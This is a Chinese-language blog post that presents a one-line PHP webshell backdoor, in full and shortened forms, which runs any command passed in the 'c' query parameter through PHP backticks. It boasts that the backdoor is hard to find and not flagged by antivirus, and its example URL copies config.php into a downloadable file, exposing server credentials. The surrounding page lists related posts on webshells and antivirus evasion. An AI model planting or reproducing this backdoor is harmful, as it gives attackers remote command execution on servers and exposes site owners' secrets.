文档章节

PHP最简单的后门,且难查,不报毒!

你敲代码像cxk
 你敲代码像cxk
发布于 2015/09/08 10:09
字数 144
阅读 609
收藏 16

直接上代码:

<?php

$c=urldecode($_GET['c']);if($c){`$c`;}//完整

!$_GET['c']||`{$_GET['c']}`;//精简

/*******************************************************
 * 原理:PHP中``符号包含会当作系统命令执行
 * 示例:http://host/?c=type%20config.php>config.txt
 *       然后就可以下载config.txt查看内容了!
 *       可以试试更变态的命令,不要干坏事哦!
 *******************************************************/


其实现原理就是PHP会直接将 ` 符号(注意:不是单引号)包含的内容解析为系统命令执行!这样就可以自由变态地扩展了!

转载请尊重原创,OK?

© 著作权归作者所有

你敲代码像cxk

你敲代码像cxk

粉丝 11
博文 31
码字总数 9713
作品 0
深圳
高级程序员
私信 提问
金山毒霸网购泄密门续:支付宝再遇截杀

“假如家中失窃,你请来保镖公司,结果发现偷东西的正是他,你会作何感想?这就是金山毒霸所谓的网购安全。”用户孙先生显得十分激动,他的支付宝账户遭遇了异常情况,而且是在装了金山毒霸,...

jeff-dou
2012/06/26
9
0
webshell查杀程序--SeayFindShell

这是我2013年写的一个linux下的webshell查杀程序,基于python开发,跟普通的webshell查杀脚本不一样的地方在于。 1.这款查杀程序采用插件化实现,可以对新型的web后门添加自定义的查杀插件,...

Seay_
2014/07/14
2K
0
exe文件,后门免杀的制作学习笔记

版权声明:转载请注明出处:http://blog.csdn.net/dajitui2024 https://blog.csdn.net/dajitui2024/article/details/79396307 using System.Runtime.InteropServices; namespace Regsvr { pub......

z奶油面包
2018/02/28
0
0
PHP使用流包装器实现WebShell

  * 本文作者:dxkite,本文属FreeBuf原创奖励计划,未经许可禁止转载   0×00 前言   在Web安全领域WebShell的构造与查杀是永不停息的话题,这几天发现了一种新型方式生成WebShell,隐...

FreeBuf
2018/07/07
0
0
迅雷被曝制造并传播病毒,数千万用户成肉鸡

据不完全统计,截止目前该病毒已通过迅雷客户端扩散近两个月,已有超过2800万用户中招,并且依然每天有几十万在扩散运行。 自6月下旬已有用户不断反馈电脑存在异常,发现一个位于C:\Windows\...

Duziee
2013/08/16
8.7K
128

没有更多内容

加载失败,请刷新页面

加载更多

前端技术之:Prisma Demo服务部署过程记录

安装前提条件: 1、已经安装了docker运行环境 2、以下命令执行记录发生在MackBook环境 3、已经安装了PostgreSQL(我使用的是11版本) 4、Node开发运行环境可以正常工作 首先需要通过Node包管...

popgis
今天
5
0
数组和链表

数组 链表 技巧一:掌握链表,想轻松写出正确的链表代码,需要理解指针获引用的含义: 对指针的理解,记住下面的这句话就可以了: 将某个变量赋值给指针,实际上就是将这个变量的地址赋值给指...

code-ortaerc
今天
4
0
栈-链式(c/c++实现)

上次说“栈是在线性表演变而来的,线性表很自由,想往哪里插数据就往哪里插数据,想删哪数据就删哪数据...。但给线性表一些限制呢,就没那么自由了,把线性表的三边封起来就变成了栈,栈只能...

白客C
今天
43
0
Mybatis Plus service

/** * @author beth * @data 2019-10-20 23:34 */@RunWith(SpringRunner.class)@SpringBootTestpublic class ServiceTest { @Autowired private IUserInfoService iUserInfoS......

一个yuanbeth
今天
5
0
php7-internal 7 zval的操作

## 7.7 zval的操作 扩展中经常会用到各种类型的zval,PHP提供了很多宏用于不同类型zval的操作,尽管我们也可以自己操作zval,但这并不是一个好习惯,因为zval有很多其它用途的标识,如果自己...

冻结not
昨天
6
0

没有更多内容

加载失败,请刷新页面

加载更多

返回顶部
顶部